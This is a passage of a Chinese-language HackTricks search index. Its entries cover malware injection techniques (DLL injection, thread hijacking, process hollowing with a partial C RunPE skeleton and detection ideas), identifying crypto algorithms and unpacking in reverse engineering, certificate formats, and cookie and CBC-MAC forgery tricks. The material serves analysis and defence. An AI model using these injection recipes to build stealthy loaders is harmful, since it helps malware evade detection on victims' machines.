Miscellaneous","id":"10041","title":"Miscellaneous"},"10042":{"body":"","breadcrumbs":"Common API used in Malware » Malware Techniques","id":"10042","title":"Malware Techniques"},"10043":{"body":"Execute an arbitrary DLL inside another process 定位要注入恶意 DLL 的进程:CreateToolhelp32Snapshot, Process32First, Process32Next 打开该进程:GetModuleHandle, GetProcAddress, OpenProcess 在进程内写入 DLL 路径:VirtualAllocEx, WriteProcessMemory 在进程中创建一个将加载恶意 DLL 的线程:CreateRemoteThread, LoadLibrary Other functions to use: NTCreateThreadEx, RtlCreateUserThread","breadcrumbs":"Common API used in Malware » DLL Injection","id":"10043","title":"DLL Injection"},"10044":{"body":"Load a malicious DLL without calling normal Windows API calls. 
The DLL is mapped inside a process, it will resolve the import addresses, fix the relocations and call the DllMain function.","breadcrumbs":"Common API used in Malware » Reflective DLL Injection","id":"10044","title":"Reflective DLL Injection"},"10045":{"body":"Find a thread from a process and make it load a malicious DLL 找到目标线程:CreateToolhelp32Snapshot, Thread32First, Thread32Next 打开线程:OpenThread 挂起线程:SuspendThread 在受害进程内写入恶意 DLL 的路径:VirtualAllocEx, WriteProcessMemory 恢复线程以加载库:ResumeThread","breadcrumbs":"Common API used in Malware » Thread Hijacking","id":"10045","title":"Thread Hijacking"},"10046":{"body":"Portable Execution Injection: 可执行文件将被写入受害进程内存并从那里执行。","breadcrumbs":"Common API used in Malware » PE Injection","id":"10046","title":"PE Injection"},"10047":{"body":"Process Hollowing is one of the favourite defence-evasion / execution tricks used by Windows malware. The idea is to launch a legitimate process in the suspended state, remove (hollow) its original image from memory and copy an arbitrary PE in its place. When the primary thread is finally resumed the malicious entry-point executes under the guise of a trusted binary (often signed by Microsoft). 典型工作流程: 启动一个良性宿主(例如 RegAsm.exe, rundll32.exe, msbuild.exe)并置于挂起状态,这样还不会执行任何指令。 c STARTUPINFOA si = { sizeof(si) };\\nPROCESS_INFORMATION pi;\\nCreateProcessA(\\"C:\\\\\\\\Windows\\\\\\\\Microsoft.NET\\\\\\\\Framework32\\\\\\\\v4.0.30319\\\\\\\\RegAsm.exe\\",\\nNULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi); 将恶意 payload 读取到内存并解析其 PE 头以获取 SizeOfImage、节和新的 EntryPoint。 NtUnmapViewOfSection / ZwUnmapViewOfSection – 解除挂起进程的原始映像基址映射。 VirtualAllocEx – 在远程进程内部为 SizeOfImage 保留 RWX 内存。 WriteProcessMemory – 先复制 Headers,然后遍历各节并复制它们的原始数据。 SetThreadContext – 修补上下文结构中 EAX/RAX(x64 为 RCX)或 Rip 的值,使 EIP 指向 payload 的 EntryPoint。 ResumeThread – 线程继续执行,运行攻击者提供的代码。 Minimal proof-of-concept (x86) skeleton: c void RunPE(LPCSTR host, LPVOID payload, DWORD payloadSize){\\n// 1. 
create suspended process\\nSTARTUPINFOA si = {sizeof(si)}; PROCESS_INFORMATION pi;\\nCreateProcessA(host, NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi); // 2. read remote PEB to get ImageBaseAddress\\nCONTEXT ctx; ctx.ContextFlags = CONTEXT_FULL;\\nGetThreadContext(pi.hThread,&ctx);\\nPVOID baseAddr;\\nReadProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,4,NULL); // 3. unmap original image & allocate new region at same base\\nNtUnmapViewOfSection(pi.hProcess,baseAddr);\\nPVOID newBase = VirtualAllocEx(pi.hProcess,baseAddr,pHdr->OptionalHeader.SizeOfImage,\\nMEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\\n// 4-5. copy headers & sections …\\n// 6. write new image base into PEB and set Eip\\nWriteProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,4,NULL);\\nctx.Eax = (DWORD)(newBase) + pHdr->OptionalHeader.AddressOfEntryPoint;\\nSetThreadContext(pi.hThread,&ctx);\\n// 7. run!\\nResumeThread(pi.hThread);\\n} 在 DarkCloud Stealer 活动中观察到的实用笔记: loader 选择 RegAsm.exe(属于 .NET Framework)作为宿主 —— 一个签名的二进制文件,不太可能引起注意。 解密后的 VB6 stealer (holographies.exe) 不会 被写入磁盘;它仅存在于 hollowed process 中,这使得静态检测更加困难。 敏感字符串(regexes、paths、Telegram credentials)对每个字符串使用 RC4 加密,并且仅在 runtime 时解密,进一步增加 memory scanning 的难度。 检测思路: 对那些创建后处于 CREATE_SUSPENDED 且在被分配为 RWX 内存区域之前从未创建 GUI/console 窗口的进程触发告警(良性代码很少这样)。 在不同进程之间寻找调用序列 NtUnmapViewOfSection ➜ VirtualAllocEx ➜ WriteProcessMemory。","breadcrumbs":"Common API used in Malware » Process Hollowing (a.k.a RunPE )","id":"10047","title":"Process Hollowing (a.k.a RunPE )"},"10048":{"body":"SSDT ( System Service Descriptor Table ) 指向内核函数 (ntoskrnl.exe) 或 GUI 驱动 (win32k.sys),因此用户进程可以调用这些函数。 rootkit 可能修改这些指针,使其指向攻击者可控的地址。 IRP ( I/O Request Packets ) 将数据片段从一个组件传递到另一个组件。内核中几乎所有东西都使用 IRPs,并且每个 device object 都有自己的函数表,可以被 hook:DKOM (Direct Kernel Object Manipulation) IAT ( Import Address Table ) 有助于解析依赖关系。可以 hook 该表以劫持将被调用的代码。 EAT ( Export Address Table ) Hooks。此类 hooks 可以在 userland 中完成。目标是 hook DLL 导出的函数。 Inline Hooks 
:这类较难实现。涉及修改函数本身的代码,例如在函数开头放置一个 jump。","breadcrumbs":"Common API used in Malware » Hooking","id":"10048","title":"Hooking"},"10049":{"body":"Unit42 – New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Common API used in Malware » References","id":"10049","title":"References"},"1005":{"body":"bash 2 btc --> 4 btc\\n3 btc 1 btc 如果添加更多输入使得变化输出大于任何单一输入,它可能会混淆启发式分析。","breadcrumbs":"Blockchain & Crypto » 示例","id":"1005","title":"示例"},"10050":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Word Macros » Word Macros","id":"10050","title":"Word Macros"},"10051":{"body":"很常见会发现 从未使用的垃圾代码 ,以使宏的逆向工程更加困难。 例如,在下图中可以看到,某个永远不会为真的条件被用来执行一些垃圾和无用的代码。","breadcrumbs":"Word Macros » 垃圾代码","id":"10051","title":"垃圾代码"},"10052":{"body":"使用 GetObject 函数可以从宏的表单中获取数据。这可以用来增加分析的难度。以下是一个宏表单的照片,用于 在文本框内隐藏数据 (一个文本框可以隐藏其他文本框): tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Word Macros » 宏表单","id":"10052","title":"宏表单"},"10053":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Cryptographic/Compression Algorithms » 加密/压缩算法","id":"10053","title":"加密/压缩算法"},"10054":{"body":"如果你在代码中 使用了右移和左移、异或以及多个算术操作 ,那么它很可能是 加密算法 的实现。这里将展示一些 识别所使用算法的方法,而无需逐步反向工程 。","breadcrumbs":"Cryptographic/Compression Algorithms » 识别算法","id":"10054","title":"识别算法"},"10055":{"body":"CryptDeriveKey 如果使用了此函数,可以通过检查第二个参数的值来找到 使用的算法 : 在这里查看可能的算法及其分配值的表格: https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id RtlCompressBuffer/RtlDecompressBuffer 压缩和解压缩给定的数据缓冲区。 CryptAcquireContext 来自 文档 : CryptAcquireContext 函数用于获取特定加密服务提供者(CSP)内特定密钥容器的句柄。 此返回的句柄用于调用使用所选CSP的CryptoAPI 函数。 CryptCreateHash 初始化数据流的哈希。如果使用了此函数,可以通过检查第二个参数的值来找到 使用的算法 : 在这里查看可能的算法及其分配值的表格: https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id","breadcrumbs":"Cryptographic/Compression Algorithms » API 函数","id":"10055","title":"API 函数"},"10056":{"body":"有时,由于需要使用特殊且唯一的值,识别算法非常简单。 如果你在谷歌中搜索第一个常量,这就是你得到的结果: 因此,你可以假设反编译的函数是 sha256计算器 。 你可以搜索其他常量,可能会得到相同的结果。","breadcrumbs":"Cryptographic/Compression Algorithms » 代码常量","id":"10056","title":"代码常量"},"10057":{"body":"如果代码没有任何显著的常量,它可能在 从.data部分加载信息 。 你可以访问该数据, 分组第一个dword 并在谷歌中搜索,就像我们在前面的部分所做的那样: 在这种情况下,如果你搜索 0xA56363C6 ,你会发现它与 AES算法的表 相关。","breadcrumbs":"Cryptographic/Compression Algorithms » 数据信息","id":"10057","title":"数据信息"},"10058":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » RC4 (对称加密)","id":"10058","title":"RC4 (对称加密)"},"10059":{"body":"它由三个主要部分组成: 初始化阶段/ :创建一个 从0x00到0xFF的值表 (总共256字节,0x100)。这个表通常称为 替代盒 (或SBox)。 
打乱阶段 :将 循环遍历之前创建的表 (0x100次迭代的循环),用 半随机 字节修改每个值。为了创建这些半随机字节,使用RC4 密钥 。RC4 密钥 的长度可以 在1到256字节之间 ,但通常建议长度超过5字节。通常,RC4密钥为16字节。 异或阶段 :最后,明文或密文与 之前创建的值进行异或 。加密和解密的函数是相同的。为此,将对创建的256字节进行循环,执行必要的次数。这通常在反编译的代码中通过**%256(模256)**来识别。 tip 为了在反汇编/反编译代码中识别RC4,你可以检查两个大小为0x100的循环(使用密钥),然后将输入数据与之前在两个循环中创建的256个值进行异或,可能使用%256(模256)","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10059","title":"特点"},"1006":{"body":"攻击者可能会向之前使用过的地址发送少量资金,希望收款人将这些资金与未来交易中的其他输入结合,从而将地址链接在一起。","breadcrumbs":"Blockchain & Crypto » 强制地址重用","id":"1006","title":"强制地址重用"},"10060":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » 初始化阶段/替代盒: (注意数字256作为计数器的使用,以及在256个字符的每个位置写入0的方式)","id":"10060","title":"初始化阶段/替代盒: (注意数字256作为计数器的使用,以及在256个字符的每个位置写入0的方式)"},"10061":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » 打乱阶段:","id":"10061","title":"打乱阶段:"},"10062":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » 异或阶段:","id":"10062","title":"异或阶段:"},"10063":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » AES (对称加密)","id":"10063","title":"AES (对称加密)"},"10064":{"body":"使用 替代盒和查找表 由于使用特定查找表值(常量),可以 区分AES 。 注意 常量 可以 存储 在二进制中 或动态 创建 。 加密密钥 必须 可被16整除 (通常为32B),并且通常使用16B的 IV 。","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10064","title":"特点"},"10065":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » SBox 常量","id":"10065","title":"SBox 常量"},"10066":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » Serpent (对称加密)","id":"10066","title":"Serpent (对称加密)"},"10067":{"body":"很少发现某些恶意软件使用它,但有例子(Ursnif) 根据其长度(极长的函数)简单判断算法是否为Serpent","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10067","title":"特点"},"10068":{"body":"在下图中注意常量 0x9E3779B9 的使用(注意该常量也被其他加密算法如 TEA - Tiny Encryption Algorithm使用)。 还要注意 循环的大小 ( 132 )和 反汇编 指令中的 异或操作 数量以及 代码 示例: 如前所述,这段代码可以在任何反编译器中可视化为 非常长的函数 ,因为其中 没有跳转 。反编译的代码可能看起来如下: 因此,可以通过检查 魔法数字 和 初始异或 来识别此算法,看到 非常长的函数 并 比较 一些 指令 与长函数的 实现 
(如左移7和左旋转22)。","breadcrumbs":"Cryptographic/Compression Algorithms » 识别","id":"10068","title":"识别"},"10069":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » RSA (非对称加密)","id":"10069","title":"RSA (非对称加密)"},"1007":{"body":"钱包应避免使用在已经使用过的空地址上收到的币,以防止这种隐私泄露。","breadcrumbs":"Blockchain & Crypto » 正确的钱包行为","id":"1007","title":"正确的钱包行为"},"10070":{"body":"比对称算法更复杂 没有常量!(自定义实现难以确定) KANAL(一个加密分析器)未能显示RSA的提示,因为它依赖于常量。","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10070","title":"特点"},"10071":{"body":"在第11行(左)有一个+7) >> 3,与第35行(右)相同:+7) / 8 第12行(左)检查modulus_len < 0x040,而第36行(右)检查inputLen+11 > modulusLen","breadcrumbs":"Cryptographic/Compression Algorithms » 通过比较识别","id":"10071","title":"通过比较识别"},"10072":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » MD5 & SHA(哈希)","id":"10072","title":"MD5 & SHA(哈希)"},"10073":{"body":"3个函数:Init、Update、Final 初始化函数相似","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10073","title":"特点"},"10074":{"body":"Init 你可以通过检查常量来识别它们。注意sha_init有一个MD5没有的常量: MD5 Transform 注意使用了更多常量","breadcrumbs":"Cryptographic/Compression Algorithms » 识别","id":"10074","title":"识别"},"10075":{"body":"更小且更高效,因为其功能是查找数据中的意外更改 使用查找表(因此你可以识别常量)","breadcrumbs":"Cryptographic/Compression Algorithms » CRC(哈希)","id":"10075","title":"CRC(哈希)"},"10076":{"body":"检查 查找表常量 : 一个CRC哈希算法看起来像:","breadcrumbs":"Cryptographic/Compression Algorithms » 识别","id":"10076","title":"识别"},"10077":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » APLib(压缩)","id":"10077","title":"APLib(压缩)"},"10078":{"body":"没有可识别的常量 你可以尝试用python编写算法并在线搜索类似的东西","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10078","title":"特点"},"10079":{"body":"图表相当大: 检查 3个比较以识别它 : tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Cryptographic/Compression Algorithms » 识别","id":"10079","title":"识别"},"1008":{"body":"确切的支付金额: 没有找零的交易很可能是在两个由同一用户拥有的地址之间进行的。 整数金额: 交易中的整数金额表明这是一次支付,而非整数输出很可能是找零。 钱包指纹识别: 不同的钱包具有独特的交易创建模式,允许分析师识别所使用的软件以及可能的找零地址。 金额与时间相关性: 公开交易时间或金额可能使交易可追踪。","breadcrumbs":"Blockchain & Crypto » 其他区块链分析技术","id":"1008","title":"其他区块链分析技术"},"10080":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 缺乏字符串 :常见的情况是打包的二进制文件几乎没有任何字符串 很多 未使用的字符串 :此外,当恶意软件使用某种商业打包工具时,常常会发现很多没有交叉引用的字符串。即使这些字符串存在,也并不意味着二进制文件没有被打包。 你还可以使用一些工具来尝试找出用于打包二进制文件的打包工具: PEiD Exeinfo PE Language 2000","breadcrumbs":"Cryptographic/Compression Algorithms » Unpacking binaries » 识别打包的二进制文件","id":"10080","title":"识别打包的二进制文件"},"10081":{"body":"从底部开始 分析打包的二进制文件 在 IDA 中向上移动 。解包器在解包代码退出时退出,因此解包器不太可能在开始时将执行传递给解包的代码。 搜索 JMP 或 CALL 到 寄存器 或 内存区域 。还要搜索 推送参数和地址方向的函数,然后调用 retn ,因为在这种情况下,函数的返回可能会调用在调用之前刚推送到堆栈的地址。 在 VirtualAlloc 上设置 断点 ,因为这会在内存中分配程序可以写入解包代码的空间。使用“运行到用户代码”或使用 F8 获取执行函数后 EAX 中的值 ,然后“ 跟踪转储中的地址 ”。你永远不知道这是否是解包代码将要保存的区域。 VirtualAlloc 的值 \\" 40 \\" 作为参数意味着可读+可写+可执行(一些需要执行的代码将被复制到这里)。 在解包 代码时,通常会发现 多个调用 到 算术操作 和像 memcopy 或 Virtual Alloc 这样的函数。如果你发现自己在一个显然只执行算术操作的函数中,可能还有一些 memcopy,建议尝试 找到函数的结束 (可能是 JMP 或调用某个寄存器) 或 至少找到 最后一个函数的调用 ,然后运行到那里,因为代码并不有趣。 在解包代码时 注意 每当你 更改内存区域 ,因为内存区域的变化可能表示 解包代码的开始 。你可以使用 Process Hacker 轻松转储内存区域(进程 --> 属性 --> 内存)。 在尝试解包代码时,知道你是否已经在处理解包代码的好方法(这样你可以直接转储它)是 检查二进制文件的字符串 。如果在某个时刻你执行了跳转(可能更改了内存区域),并且你注意到 添加了更多字符串 ,那么你可以知道 你正在处理解包的代码 。 然而,如果打包工具已经包含了很多字符串,你可以查看包含“http”这个词的字符串数量,看看这个数字是否增加。 当你从内存区域转储可执行文件时,可以使用 PE-bear 修复一些头部。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS 
Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Cryptographic/Compression Algorithms » Unpacking binaries » 基本建议","id":"10081","title":"基本建议"},"10082":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Certificates » 证书","id":"10082","title":"证书"},"10083":{"body":"一个 公钥证书 是在密码学中用于证明某人拥有公钥的数字身份。它包括密钥的详细信息、所有者的身份(主题)以及来自受信任机构(发行者)的数字签名。如果软件信任发行者并且签名有效,则可以与密钥的所有者进行安全通信。 证书主要由 证书颁发机构 (CAs) 在 公钥基础设施 (PKI) 设置中颁发。另一种方法是 信任网络 ,用户直接验证彼此的密钥。证书的常见格式是 X.509 ,可以根据 RFC 5280 中概述的特定需求进行调整。","breadcrumbs":"Certificates » 什么是证书","id":"10083","title":"什么是证书"},"10084":{"body":"","breadcrumbs":"Certificates » x509 常见字段","id":"10084","title":"x509 常见字段"},"10085":{"body":"在 x509 证书中,几个 字段 在确保证书的有效性和安全性方面发挥着关键作用。以下是这些字段的详细说明: 版本号 表示 x509 格式的版本。 序列号 在证书颁发机构(CA)系统中唯一标识证书,主要用于撤销跟踪。 主题 字段表示证书的所有者,可以是机器、个人或组织。它包括详细的身份识别,例如: 通用名称 (CN) :证书覆盖的域。 国家 (C) 、 地方 (L) 、 州或省 (ST, S, or P) 、 组织 (O) 和 组织单位 (OU) 提供地理和组织的详细信息。 区分名称 (DN) 概括了完整的主题识别。 发行者 详细说明了谁验证并签署了证书,包括与主题类似的子字段。 有效期 由 生效时间 和 失效时间 时间戳标记,确保证书在某个日期之前或之后不被使用。 公钥 部分对于证书的安全至关重要,指定公钥的算法、大小和其他技术细节。 x509v3 扩展 增强了证书的功能,指定 密钥使用 、 扩展密钥使用 、 主题备用名称 和其他属性,以微调证书的应用。 密钥使用和扩展 密钥使用 确定公钥的密码应用,例如数字签名或密钥加密。 扩展密钥使用 进一步缩小证书的使用案例,例如用于 TLS 服务器身份验证。 主题备用名称 和 基本约束 定义证书覆盖的其他主机名,以及它是否是 CA 证书或终端实体证书。 标识符如 主题密钥标识符 和 授权密钥标识符 确保密钥的唯一性和可追溯性。 授权信息访问 和 CRL 分发点 提供路径以验证发行 CA 并检查证书撤销状态。 CT 预证书 SCTs 提供透明日志,对于公众信任证书至关重要。 python # Example of accessing and using x509 
certificate fields programmatically:\\nfrom cryptography import x509\\nfrom cryptography.hazmat.backends import default_backend # Load an x509 certificate (assuming cert.pem is a certificate file)\\nwith open(\\"cert.pem\\", \\"rb\\") as file:\\ncert_data = file.read()\\ncertificate = x509.load_pem_x509_certificate(cert_data, default_backend()) # Accessing fields\\nserial_number = certificate.serial_number\\nissuer = certificate.issuer\\nsubject = certificate.subject\\npublic_key = certificate.public_key() print(f\\"Serial Number: {serial_number}\\")\\nprint(f\\"Issuer: {issuer}\\")\\nprint(f\\"Subject: {subject}\\")\\nprint(f\\"Public Key: {public_key}\\")","breadcrumbs":"Certificates » x509 证书中的常见字段","id":"10085","title":"x509 证书中的常见字段"},"10086":{"body":"OCSP ( RFC 2560 ) 涉及客户端和响应者共同检查数字公钥证书是否已被撤销,而无需下载完整的 CRL 。这种方法比传统的 CRL 更高效,后者提供被撤销证书序列号的列表,但需要下载一个可能很大的文件。CRL 可以包含多达 512 个条目。更多细节可在 这里 找到。","breadcrumbs":"Certificates » OCSP与CRL分发点的区别","id":"10086","title":"OCSP与CRL分发点的区别"},"10087":{"body":"证书透明性通过确保 SSL 证书的发行和存在对域名所有者、CA 和用户可见,帮助抵御与证书相关的威胁。其目标包括: 防止 CA 在未通知域名所有者的情况下为域名发行 SSL 证书。 建立一个开放的审计系统,以跟踪错误或恶意发行的证书。 保护用户免受欺诈证书的影响。 证书日志 证书日志是公开可审计的、仅附加的证书记录,由网络服务维护。这些日志提供加密证明以供审计使用。发行机构和公众均可向这些日志提交证书或查询以进行验证。虽然日志服务器的确切数量并不固定,但预计全球不会超过一千个。这些服务器可以由 CA、ISP 或任何感兴趣的实体独立管理。 查询 要探索任何域的证书透明性日志,请访问 https://crt.sh/ 。 存储证书的不同格式各有其使用案例和兼容性。此摘要涵盖主要格式并提供转换指导。","breadcrumbs":"Certificates » 什么是证书透明性","id":"10087","title":"什么是证书透明性"},"10088":{"body":"","breadcrumbs":"Certificates » 格式","id":"10088","title":"格式"},"10089":{"body":"最广泛使用的证书格式。 需要为证书和私钥分别创建文件,采用 Base64 ASCII 编码。 常见扩展名:.cer, .crt, .pem, .key。 主要用于 Apache 和类似服务器。","breadcrumbs":"Certificates » PEM格式","id":"10089","title":"PEM格式"},"1009":{"body":"通过监控网络流量,攻击者可能将交易或区块与IP地址关联,从而危及用户隐私。如果一个实体运营多个比特币节点,这种情况尤其明显,因为这增强了他们监控交易的能力。","breadcrumbs":"Blockchain & Crypto » 流量分析","id":"1009","title":"流量分析"},"10090":{"body":"证书的二进制格式。 缺少 PEM 文件中找到的 \\"BEGIN/END CERTIFICATE\\" 语句。 常见扩展名:.cer, .der。 通常与 Java 平台一起使用。","breadcrumbs":"Certificates 
» DER格式","id":"10090","title":"DER格式"},"10091":{"body":"以 Base64 ASCII 存储,扩展名为 .p7b 或 .p7c。 仅包含证书和链证书,不包括私钥。 受 Microsoft Windows 和 Java Tomcat 支持。","breadcrumbs":"Certificates » P7B/PKCS#7格式","id":"10091","title":"P7B/PKCS#7格式"},"10092":{"body":"一种二进制格式,将服务器证书、中间证书和私钥封装在一个文件中。 扩展名:.pfx, .p12。 主要用于 Windows 的证书导入和导出。","breadcrumbs":"Certificates » PFX/P12/PKCS#12格式","id":"10092","title":"PFX/P12/PKCS#12格式"},"10093":{"body":"PEM 转换 对于兼容性至关重要: x509 到 PEM bash openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem PEM 转 DER bash openssl x509 -outform der -in certificatename.pem -out certificatename.der DER 转 PEM bash openssl x509 -inform der -in certificatename.der -out certificatename.pem PEM 转 P7B bash openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer PKCS7 转 PEM bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem PFX 转换 对于在 Windows 上管理证书至关重要: PFX 到 PEM bash openssl pkcs12 -in certificatename.pfx -out certificatename.pem PFX 转 PKCS#8 涉及两个步骤: 将 PFX 转换为 PEM bash openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem 将PEM转换为PKCS8 bash openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8 P7B 转 PFX 还需要两个命令: 将 P7B 转换为 CER bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer 将 CER 和私钥转换为 PFX bash openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer ASN.1 (DER/PEM) 编辑 (适用于证书或几乎任何其他 ASN.1 结构): 克隆 asn1template bash git clone https://github.com/wllm-rbnt/asn1template.git 将 DER/PEM 转换为 OpenSSL 的生成格式 bash asn1template/asn1template.pl certificatename.der > certificatename.tpl\\nasn1template/asn1template.pl -p certificatename.pem > certificatename.tpl 根据您的要求编辑 certificatename.tpl bash vim certificatename.tpl 重建修改后的证书 bash openssl asn1parse -genconf certificatename.tpl -out certificatename_new.der\\nopenssl asn1parse -genconf certificatename.tpl 
-outform PEM -out certificatename_new.pem tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Certificates » 格式转换","id":"10093","title":"格式转换"},"10094":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果 cookie 仅仅是 用户名 (或者cookie的第一部分是用户名),并且你想要冒充用户名“ admin ”。那么,你可以创建用户名**\\"bdmin\\" 并 暴力破解 cookie的 第一个字节**。","breadcrumbs":"Cipher Block Chaining CBC-MAC » CBC","id":"10094","title":"CBC"},"10095":{"body":"密码块链消息认证码 ( CBC-MAC )是一种用于密码学的方法。它通过逐块加密消息来工作,每个块的加密与前一个块相链接。这个过程创建了一个 块链 ,确保即使改变原始消息的一个比特,也会导致最后一个加密数据块的不可预测变化。要进行或逆转这样的变化,需要加密密钥,以确保安全性。 要计算消息m的CBC-MAC,可以在零初始化向量下以CBC模式加密m,并保留最后一个块。下图勾勒了使用秘密密钥k和块密码E计算由块组成的消息的CBC-MAC的过程 https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5 : https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png","breadcrumbs":"Cipher Block Chaining CBC-MAC » CBC-MAC","id":"10095","title":"CBC-MAC"},"10096":{"body":"在CBC-MAC中,通常 使用的IV是0 。 这是一个问题,因为两个已知消息(m1和m2)独立生成两个签名(s1和s2)。所以: E(m1 XOR 0) = s1 E(m2 XOR 0) = s2 